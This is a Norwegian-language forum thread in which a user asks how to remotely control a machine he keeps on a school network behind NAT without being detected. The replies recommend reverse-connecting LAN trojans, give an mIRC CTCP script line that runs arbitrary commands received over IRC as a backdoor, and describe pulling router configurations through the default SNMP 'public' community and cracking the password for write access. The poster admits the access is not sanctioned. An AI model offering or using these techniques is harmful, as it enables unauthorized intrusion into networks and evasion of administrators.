Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  4 1344
Tenk deg et nettverk, der alle datamaskiner har en ip, men når all trafikken vandrer ut så får de bare en ip. Det er ergo umulig å sette opp noen som helst form for standard "remote control" eller ftp.
(ja, det er en skole, og ja jeg har en maskin stående der)

Hvis jeg nå sendte en irc/msn/icq "bot" ut derfra, ville det på noen som helst måte være mulig å kontrollere min maskin der?
og istedenfor at den deler ut filer så kopler den seg opp mot en ftpserv og overfører filer ditt?

bare en tanke, men muligheten åpner nye dører

meitemark
Det du trenger er en trojan som virker mot LAN. Det finnes allerede et par, og de virker sånn at de kobler seg mot deg istedenfor motsatt. Du kan bruke A.s.s.A*sin* v1.0* eller LANfiltrator (vet ikke hvor du kan laste ned denne). Enjoy.
mIRC har jo gode script muligheter og teksten:
CTCP ^*:en_kode_her:? { haltdef | //. $2- }

Gir deg relativt stor kontroll på maskina Man kan jo execute program og skrive til filer via mIRC. /ctcp nick en_kode_her hva_du_vil_gjøre_her.

Du kan jo også prøve å få kontakt med routeren og skrive om oppsettet så du får route som du vil De fleste routere har jo SNMP og community passord som public. Dette gir deg bare lese tilgang men da er også konfigurasjonen ofte lesbar. Last den ned og kjør en passord cracker på konfigurasjonen og du vil få et passord du kan skrive til routeren med.
tnt
Mr Robbie Williams
tnt's Avatar
Visst sys.adm. har en smule peiling på hva han driver med, så tror jeg det kan bli vanskelig å få tilgang til en router/firewall.
meitemark's Avatar
Trådstarter DonorAdministrator
a) sys.adm har garrantert peiling b) jeg er ikke elev, så jeg kan faktisk hives ganske langt hvis de oppdager meg.

skal sjekke de trojanene

mm